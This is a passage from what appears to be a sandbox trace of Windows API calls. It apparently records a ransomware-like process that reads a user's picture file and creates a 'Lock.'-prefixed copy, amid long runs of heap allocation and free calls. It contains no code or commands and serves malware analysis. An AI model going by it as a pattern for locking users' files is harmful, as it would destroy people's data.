hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0256.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0256.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0256.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.603] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Ur-fU4s.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ur-fu4s.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0256.604] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0256.604] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0256.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0256.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.604] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Lock.Ur-fU4s.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lock.ur-fu4s.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0256.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.606] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.606] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0256.607] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xe5f1, lpOverlapped=0x0) returned 1 [0256.608] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0256.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f1) returned 0x24b7a48 [0256.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0256.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0256.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0256.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0256.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0256.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f1) returned 0x24c6048 [0256.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0256.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.610] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f1) returned 0x24b7a48 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0256.611] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.612] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0256.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f1) returned 0x24b7a48 [0256.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0256.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0256.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0256.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe5f1) returned 0x24d4648 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.614] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0256.614] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0256.614] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.615] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0256.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0256.615] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0256.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0256.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 